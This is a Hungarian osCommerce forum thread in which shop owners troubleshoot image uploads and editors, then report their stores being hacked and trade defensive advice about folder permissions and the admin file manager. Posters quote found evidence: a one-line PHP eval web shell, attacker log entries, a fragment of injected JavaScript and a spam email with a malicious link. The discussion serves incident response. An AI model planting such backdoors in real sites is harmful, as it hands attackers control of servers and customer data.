Dehogy nincs leírás, több is van: [link]
[link]
[link]
[link]

Aki keres, talál

http://oscommerce-extra.hu - OsCommerce Magyarország

Köszönöm a választ az első segített.

Másik érdekes kérdés: Termék felvitelnél nem tölti fel a képet, hibát ír ki, hogy warning_no_uploaded_image vagy mi.

Ingyenes tárhelyen van az oldal, de egy másik áruháznál működött.
Ötlete van valakinek?

Köszönöm.

Persze, fizetős tárhely.

Ha korábban működött az volt a hiba!

Images mappa attribútuma mi?

Diablo. Ha gumira van szükséged ...

Ingyenes tárhelyen én nem üzemeltetnék webáruházat,
de nem is vásárolnék ilyen webáruházban, ha én lennék a vevő...

Ingyenes tárhelyeken a képfeltöltés sokszor speciális beállításokkal jár együtt,
ezeket a szolgáltató oldalán megtalálod, de legtöbbször elég, ha 777- es jogosultságot adsz az images mappának.

http://oscommerce-extra.hu - OsCommerce Magyarország

Hát nem is webáruház lenne belőle, mert már egy kicsit át van szerkesztve, amolyan katalógus féle.

Egy másik áruházat tesztelés céljából feltettem egy ingyenes tárhelyre, de azzal nem volt ilyen probléma.

Természetesen az images mappának 777-es jogosultságot adtam, de semmi. Próbáltam az upload.php fájlt is lecserélni egy másikra, illetve kommentezni (//) a hibát, hogy ne jelenjen meg.

Érdekes, nem tudom, hogy mi lehet.

Akkor legalább áruld el hogy melyik ingyenes tárhelyen van,
mert enélkül igencsak nehéz segíteni

A shop biztosan jó, nem ír ki semilyen hibákat magától...
...a gond a tárhellyel van...vagy azzal aki módosította a shop fájlokat

http://oscommerce-extra.hu - OsCommerce Magyarország

Hogy én mekkora barom vagyok!!!!!!!!

A shop az atw.hu-n van, de meg van a probléma

a tmp könyvtár nem volt a tárhelyen

Nem kellet volna vendégségben annyit inni

Azért köszönöm a segítséget, volt közte hasznos.

Hát megint ÉN

A tinyMCE nálam teljesen alap módon jelenik meg, amit azt láthatjátok a képen.
Ezt hol lehet beállítani, hogy "fullosan" jelenjen meg, mint a hivatalos oldalon???? http://tinymce.moxiecode.com/examples/full.php

[ Szerkesztve ]

Ott minden tökéletesen le van írva.

A Full mód megtekintésekor kattints a View Source gombra és az ott látott scriptet illeszd be a mostani scripted helyére.

Diablo. Ha gumira van szükséged ...

Szia djsite!

Hú de ismerős tán nem valamelyik MALA OSC verziót használod?
Ha igen akkor keress meg és szívesen segítek haveri alapon (ingyé')

Ja egyébként
KELLEMES KARÁCSONYI ÜNNEPEKET ÉS BOLDOG ÚJ ÉVET KÍVÁNOK MINDEN KEDVES FÓRUMOZÓ TAGNAK MINDKÉT FÓRUMON!

Üdv:
mala

http://oscommerce-extra.hu - OsCommerce Magyarország - - - - - - - - - - - - - - - - - - - ''A lustaság az evolució motorja!''

Sziasztok!

Én és még pár regisztrált felhasználó kapott automatikus levelet, amit nem értek, hogy miért?

Return-Path: <clairebijou@s16.mediacenter.hu>
Delivered-To: nemethg79@freemail.hu
Received: (qmail 2360 invoked from network); 25 Dec 2009 10:50:56 +0100
Received: from s16.mediacenter.hu (195.70.48.70)
by fmx06.freemail.hu with SMTP; 25 Dec 2009 10:50:56 +0100
Received: from clairebijou by s16.mediacenter.hu with local (Exim 3.36 #1 (Debian))
id 1NO6oq-0001u6-00
for <nemethg79@freemail.hu>; Fri, 25 Dec 2009 10:50:48 +0100
To:<nemethg79@freemail.hu>
Subject: Giant choice solely NOW
From: info@www.clairebijou.hu
MIME-Version: 1.0
X-Mailer: osCommerce
Content-Type: text/plain; charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
Message-Id: <E1NO6oq-0001u6-00@s16.mediacenter.hu>
Sender: <clairebijou@s16.mediacenter.hu>
Date: Fri, 25 Dec 2009 10:50:48 +0100
X-Freemail: message scanned


Hey dude! I offer you great proposition.<br> <a href="http://hitman.net63.net/audio/fco2y8.php">Right Here!</a> <br> <style>{WWZ0EwFZGO9Pkv&pDBXE_S}lQ%</style>

Valaki találkozott már ilyennel vagy hasonlóval???
Illetve a probléma mi lehet, hogy ilyeneket kapok és küld az áruház?

Szia Mala!

Ez a meta tagos rész amit írtál, hogy az oldal címe a megjelenített termék neve legyen nekem nem megy. Mi lehet a hiba, mi nem jó? Elvileg minden stimmel

Köszönöm!

Szia,

ilyeneket én is kapok tőled minden nap...légyszi törölj ki a felhasználók listájából
Kíváncsi vagyok, hogy akkor is kapok-e még spam-et tőled.
Ha igen akkor szívás...mert ellopták az ügyfél adatbázisodat...ha nem, akkor viszont még lehet tenni valamit.
Mindenesetre szerintem először töröld ki ideiglenesen (1-2 napra) a contact_us.php fájlt, hátha azt hekkelik folyamatosan.
ha nem, akkor lehet hogy ftp-n keresztül feltörték a tárhelyet és beraktak egy spammelő php progit valahová.
Az admin mappában ki van törölve a file_manager.php fájl ??? (ez komoly biztonsági rés)

http://oscommerce-extra.hu - OsCommerce Magyarország

djsite!

Nézd meg van-e az images mappádban img.php fájl!

Kapsz a miért kérdésedre választ, ha a levélben lévő linkre kattintasz.

Azért hogy rendelj viagrát.

Többször írtuk itt milyen támadások várhatók és mi a védelem módja.

Diablo. Ha gumira van szükséged ...

Szia Vakondka, Diablo!

a file_manager.php fájl ott van az adminban, kitöröltelek a vásárlók közül Vakondka.

Diablo! Az images mappában nincs img.php fájlom.

Most mit lehet tenni???

Tanulságot megjegyezni!
Sűrűbben olvasni a fórumot.
Hozzáértőre bízni az osc telepítést.
Nem kísérletezni ingyenes tárhelyen.

stb..stb..

Ha ellopták az adatbázisodat, akkor már semmit, minden regisztrál vásárlód an****zni fog és nem tudsz elleni tenni már semmit.

Az áruházad megtisztítható a még benne lévő fertőzéstől, ezt beszéljük meg privát.
További védelem megoldható, ha figyelsz rá.

Többször írták itt, hogy a file_manager.php TÖRÖLNI KELL!!

Akkor hol voltál????

[ Szerkesztve ]

Diablo. Ha gumira van szükséged ...

Van egy fly.php fájlom a catalogban, az alábbi tartalommal és nem tudom, hogy ez mi.
test<?php @eval($_POST[code]);?>

Lehet, hogy ez okoz valami?

Sajnos "Karácsonyi ajándék" gyanánt valaki feltörte a mi oldalunkat is.
Belenéztem FTP-vel a log-ba és némi nyom látszik, pl.:
83.149.3.22 - - [25/Dec/2009:19:24:05 +0100] "POST /rss.php HTTP/1.1" 200 2802 "http://www.xxx.hu/rss.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6"
83.149.3.22 - - [25/Dec/2009:19:24:07 +0100] "GET /rss.php HTTP/1.1" 200 6602 "http://www.xxx.hu/rss.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6"

Természetesen azonnal töröltem a "rss.php"-t, amit a cracker rakott fel!

[ Szerkesztve ]

nem lehet hanem biztos !!!!!!!!!!

ftp jelszót azonnal megváltoztatni, fájlt letörölni, plusz az adminról azt a bizonyos file_manager.php-t is !

[ Szerkesztve ]

http://oscommerce-extra.hu - OsCommerce Magyarország

HÚ!!!

Nem semmi! Köszönöm, elvégeztem amiket írtál!

A törlés más kevés, azonnal változtass meg minden jelszót és amit még tudsz ami a hozzáférést lehetővé teszi, hiszen aki azt feltette, mindent tud!

Diablo. Ha gumira van szükséged ...

Feltettem ide pár hete egy hatásos megoldást árházunk védelmére.

Csupán 2 tag kérte, hogy neki is legyen.

Ingyenes volt, most is az.

Lényege az, hogy esetleges fertőzésről azonnal értesít, és megírja HOL történt a fertőzés, hiszen azt teljesen kivédeni szinte lehetetlen.

[ Szerkesztve ]

Diablo. Ha gumira van szükséged ...

Köszönöm a választ és a segítséget is.

Azért elég érdekes, hogy ezeket az információkat csak itt a fórumon találhatja meg az ember, illetve ha a file_manager.php-t le kell törölni az admin könyvtárból, akkor meg minek kell?

Tudom nem vagyok profi, de egy-két dolgot megtudok csinálni, erre viszont nem számítottam, hogy "megkörnyékeznek"

Kérdés: Ha az admin mappát átnevezem, akkor máshol nem kell beállítani, átírni semmit?

Van egy rossz hírem...

Egy ismerősöm pont most jelezte, hogy valószínűleg feltörték a shopját és ugyanazok a fájlok jelentek meg nála is mint nálad.
Nála 800 fájl fertőződött meg, bár nála sok bővítmény van...
...szóval ha ugyanaz a vírus, akkor nálad is sokkal több fájl fertőzött mint gondolnád.

Nézd meg a js kiterjesztésű fájlokat a rendszeredben, valószínűleg ott lesz a végére beszúrva egy ilyen kezdetű javascript:

/*GNU GPL*/ try{window.onload = function(){var Jqjzlgspz98uxl

Ha ez ott van, akkor sajnos nálad is ugyanaz a helyzet, vagyis valószínűleg az összes php, html és js fájlba beszúrta magát a vírus valahová...

http://oscommerce-extra.hu - OsCommerce Magyarország

Sziasztok!
Nekem is van egy rossz hírem:
Az enyémet is feltörték, azt hiszem.
Az images mappában volt egy tempo.php file, amit megnéztem és a hetedik sorban ez állt:
print "<center><h1>You have been hack By Shany with Love To #worst.</h1></center>";

A tárhelyről már töröltem, szívesen elküldöm értelmezésre akit ez érdekel, mert fogalmam sincs, hogy mit csinál, de mintha a levelezésemmel lenne összefüggésben.

Pedig nekem törölve van a file_manager és az FTP kapu is be van kapcsolva.
Most mit tegyek???

Szia!

Keress meg skypon, priviben írtam a címem.

Megoldjuk, csak mond el hogyan és mit akarsz és együtt megoldjuk

A webshopok feltöréséről meg annyit, valószínűleg má' megin' ftp adatok ellopásával nyomultak be a shopokba, vagy esetleg valamelyik általatok (általunk) használt bővítésben van valami biztonsági rés.

Koli melyik boltodat nyomták fel?

Üdv:

mala

http://oscommerce-extra.hu - OsCommerce Magyarország - - - - - - - - - - - - - - - - - - - ''A lustaság az evolució motorja!''

Az images mappát nem lehet levédeni, (nehéz) mert abba szerkesztésnél képet töltünk fel, illetve a képeknek "futniuk kell" hogy megjeleníthetők legyenek ezért ez a leggyakoribb támadási mappa.

A Médiacenter belépési oldalán szeptember 7 óta olvasható a felhívás, hogy osc biztonsági résről és a file_managert ajánlott törölni.

Diablo. Ha gumira van szükséged ...

Szia Mala!
A kollart.hu-t törték fel.
Már írtam a MC-nek, hátha ők tudnak valamit.

Szia Diablo!
A file_manager.php-t azonnal töröltem, amint szóltatok.
Az FTP kaput pedig egy percre sem kapcsoltam ki.
Megnéztem a tárhelyemet és nem találtam az elmúlt két hónapban illetéktelen behatolást.

Szerintem a szerverről akartak (vagy már meg is tették) felhasználói adatokat kilistázni.
Legalábbis a file tartalma mintha erre utalna. De lehet, hogy tévedek.
Remélem nem sikerült a tervük.

[ Szerkesztve ]

Rengeteg féle feltörés van sajnos, szóval ahoz, hogy segítsünk az összes fájlodat látni kellene
Nem lehet, hogy régi verziós a webshopod ? MS2.2 ???
Mert abban annnyi biztonsági rés van, hogy a letörlésen kívül mást nem érdemes tenni vele...

http://oscommerce-extra.hu - OsCommerce Magyarország

Jesszus!... Most olvasom a shop-feltöréseket!

Ahogy most olvasom vissza a történteket, beugrott, hogy én már hetek óta kapok egy magyar email-címről Spam-leveleket, ami azért is tűnt fel, mert ezzel a domain-el itt készített velünk együtt valaki egy shopot!!!

info@www.clairebijou.hu

=>> www.clairebijou.hu !!!

Pár napja írtam egy figyelmeztető levelet ennek a shopnak, szerintem feltörték a webshopját és a tudta nélkül küldözgetnek a nevében Spam-leveleket... (Vagy nem tudom.)

Most látom, hogy a te shopodban is ez a domain szerepel : ez nem lehet véletlen!!!

< A lehetetlen mindössze annyit jelent, hogy még nem találtad meg a megoldást. >

Kolly!
Ahogy írtam, az images mappát igen nehéz megvédeni, hasonló támadásom volt nekem is. Beazonosítható MC-nél a támadó IP címe és a támadás pontos ideje, ha megnézed a tempo.php létrahozási dátumát és kikeresed milyen IP cím kapcsolat volt abban az időben a webszervernaplóban. Így visszakereshető, hogy az oldalra hogyan jutottak be, weben keresztül. Nem kell hozzá semmi ftp cím és ftp kapcsolat, sajnos.

Ha megvan a cím kérem írd meg privátban a napló teljes sorát, megírom majd hogyan lehet kivédeni a következő ilyen támadást.

Küld el, illeszd be a privát levélbe a tempo.php tartalmát is, kód formában.

[ Szerkesztve ]

Diablo. Ha gumira van szükséged ...

"...83.149.3.22 - - [25/Dec/2009:19:24:05 +0100] "POST /rss.php HTTP/1.1" 200 2802 "http://www.xxx.hu/rss.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6"..."

==================================

83.149.3.22

Hostname: ip-83-149-3-22.nwgsm.ru
ISP: OJSC MegaFon
Organization: North-West Branch of OJSC MegaFon Network.
Proxy: None detected
Type: Unknown

Country: Russian Federation
State/Region: 66
City: Saint Petersburg
Latitude: 59.8944
Longitude: 30.2642

===================================

Szentpétervári, orosz illetőségű a bepofátlankodó!

(A böngészőjébe is orosz nyelv van telepítve.)

< A lehetetlen mindössze annyit jelent, hogy még nem találtad meg a megoldást. >

Diablo!

Hol van ez a tempo.php fájl???...

< A lehetetlen mindössze annyit jelent, hogy még nem találtad meg a megoldást. >

Az csak a feltört shopokban van, de ott is csak azokban amit pont ezzel a módszerrel törtek fel....ha jól értettem az images mappában kell keresni.
Mellesleg csak olyan mappába lehet írni, amire 777-es jogosultság van beállítva.
vannak akik az images mappára 777-et állítanak be maguknak, így már kívülről is fel lehet oda tölteni egy fájlt és lefuttatni, majd átvenni a teljes irányítást.

A mappák normális attributum beállítása 755, az images mappán is !

Így is tökéletesen működnie kell adminról a kép feltöltésnek, kívülről viszont nem férhetnek hozzá, legalábbis írni nem tudnak bele és ez a lényeg.
Akinek csak akkor működik a képfeltöltés, ha 777-et állít be az images mappán, az váltson tárhely szolgáltatót, mert ez nagyon alap dolog...és komoly biztonsági rés.

[ Szerkesztve ]

http://oscommerce-extra.hu - OsCommerce Magyarország

Ha nincs megfertőzve a shopod images mappája akkor sehol. Ha img.php-t találsz ott akkor szintén fertőzésed van. Az img.php tartalmát, védelmi módját már ismerem.

Tempo.php-vel még nem találkoztam, ezért érdekelne mi van benne, hogyan lehet kivédeni, hogy ne tudjon csinálni semmit, akkor sem ha már "bekerült" a shopunkba.

Diablo. Ha gumira van szükséged ...

Köszönöm, Diabló és Vakondka!

Én nem találtam a shopjaimban (egyelőre) sem image.php, sem tempo.php, sem fly.php fájlokat...

Komolyan, ezt nem is értem, hogy FTP-védelem, IP-védelem, átnevezett Admin-mappa ellenére hogyan tudnak beférkőzni a shopjainkba?!

< A lehetetlen mindössze annyit jelent, hogy még nem találtad meg a megoldást. >

Nagyon egyszerűen. Amelyik mappára777-et állítasz be, azzal Te magad engedélyezed, hogy bárki bármit csinálhasson a mappán belül.
Nézd meg total commmanderben ftp vel egy próba mappán, hogy mit jelent a 777
Írás, olvasás, végrehajtás bárki (azt írja: világ) számára !

Ellenben a 755 már nem ad írási jogosultságot, csak a "tulajdonos" számára.
Vagyis a már szerveren lévő szkriptek és ftp segítségével lehet ez esetben feltölteni oda fájlokat, normál http protokoll segítségével nem.

http://oscommerce-extra.hu - OsCommerce Magyarország

Sok shopban van az admin oldalon biztonsági rés. Ha az admin könyvtár neve admin: nyitott kapu!
Néhány shopban van vevő oldalon képfeltöltési lehetőség. Ez is nyitott kapu, sajnos.

Diablo. Ha gumira van szükséged ...

Kedves barátaim!
Sajnos - vagy szerencsére a sok tennivaló miatt, kicsit elhanyagoltam a fórumot, és mindent. Le is vontam a tanulságot, -felesleges kézzel lábbal kapálózni a haladás érdekében, az állam úgyis csak annyival gombol le jobban, hogy nehogy sikerüljön a tavalyi színvonalat(tisztességes úton) átlépni....
Szeretném megköszönni mindegyikőtöknek a segítségét, az építő jellegű hozzászólását, vagy bármit amivel 2es tudásom kipótoltátok, hogy az áruházam olyan maradjon amilyen most. Mind tudjátok kinek volt hozzá 1 perc köze is, nem részletezem, mert a fél stáblistát felsorolhatnám.
Szóval Köszönöm Nektek, és remélem ha 2010-ben is a homály borít be valamível kapcsolatban, számíthatok RÁTOK.

Boldog Új Évet Kívánok Nektek, És kedves Családtagjaitok Számára -politikamentesen, de tényleg bízva egy kicsit szebb jövőben!
Üdvözlettel: PILU

http://www.webshop.munkaruhadiszkont.hu/ - - - - - http://www.munkaruhadiszkont.hu/

Diablo. Ha gumira van szükséged ...

Mindenkinek én is nagyon boldog új évet kívánok!

Sziasztok !

Mindenkit várunk sok szeretettel a szilveszteri chat party-ra !

klikk ide: [link]

vakondka, tgely, Marsy

http://oscommerce-extra.hu - OsCommerce Magyarország

Boldog Új Évet Kívánok Mindenkinek!

Gyertek chatelni!

Marsy51 ("The truth is out there") osCommerce - Magyarország http://www.oscommerce-extra.hu

Kolli shopjában az elsők között lett átnevezve az Admin mappa, nincs nála weboldalról feltöltési lehetőség...

Jó lenne megfejteni, hogyan törik fel a shopokat, mert akkor tudnánk védekezni.

< A lehetetlen mindössze annyit jelent, hogy még nem találtad meg a megoldást. >

< A lehetetlen mindössze annyit jelent, hogy még nem találtad meg a megoldást. >

Sziasztok!

Egy webáruházon dolgozom, amelyben külön kell kis- és nagyker ár. A vevő adataihoz került be a viszonteladói opció, ez alapján dől el, hogy melyik árat látja böngészéskor.

Elég sok mindenbe bele kellett nyúlnom, működik is majdnem minden, kivéve a bevásárló kosár. Ott nem sikerül a nagyker árat elővarázsolni. Egyszerűen eddig nem jöttem rá, hogy melyik fájlban kerül meghatározásra a final_price értéke.

Tudtok ebben segíteni?

Köszi és BUÉK!

Megyek Agárdra fürdőzni. Rám biztos szép nap fog virradni

[ Szerkesztve ]

http://www.webshop.munkaruhadiszkont.hu/ - - - - - http://www.munkaruhadiszkont.hu/

Nekem 2 aldomain van, a viszonteladóban csak az engedélyezettek látják az árat, a másikban mindenki.

http://www.webshop.munkaruhadiszkont.hu/ - - - - - http://www.munkaruhadiszkont.hu/

Az lett volna a B-változat, de egyelőre ezzel próbálnék dűlőre jutni.

Marsy csinált ilyen shopot (de úgy emlékszem, nála is két külön shopban lett végül megoldva)...

< A lehetetlen mindössze annyit jelent, hogy még nem találtad meg a megoldást. >